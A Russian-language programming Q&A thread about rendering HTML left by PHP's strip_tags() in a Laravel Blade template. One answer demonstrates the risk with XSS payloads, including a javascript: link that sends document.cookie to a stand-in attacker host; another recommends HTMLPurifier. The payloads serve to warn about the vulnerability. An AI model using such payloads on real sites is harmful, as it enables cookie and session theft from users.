@givemoneybiatch
Немного веб, немного гейм

Как в strip_tags() передать HTML?

Всем привет. Есть переменная, которая обрабатывается функцией strip_tags() и затем отправляется на HTML.
$marketDescOne      =  " your <a href='#'>link</a> lorem ipsum.";
$obj->marketDescOne     = strip_tags($marketDescOne,'<a>');

Но при выводе в HTML
<p class="mobile-text-small">
            {{ $market->marketDescOne }}
          </p>

получаю просто текст с тегами 'a', но мне надо чтобы в хтмл теги влетели как теги, а не текст. Есть какой-то способ? Не могу придумать
  • Вопрос задан
  • 216 просмотров
Решения вопроса 1
Denormalization
@Denormalization
Использовать {!! $market->marketDescOne !!}
Но это ниразу не правильно и так нельзя.
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
miraage
@miraage
Старый прогер
<a href="javascript:alert('hellowz')">link</a>
<a href="javascript:new Image().src('http://hacker.com/hellowz?c=' + document.cookie)">link</a>
Ответ написан
AmdY
@AmdY
PHP и прочие вебштучки
strip_tags не фильтрует атрибуты у тегов. лучше использовать библиотеку htmlpurifier
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы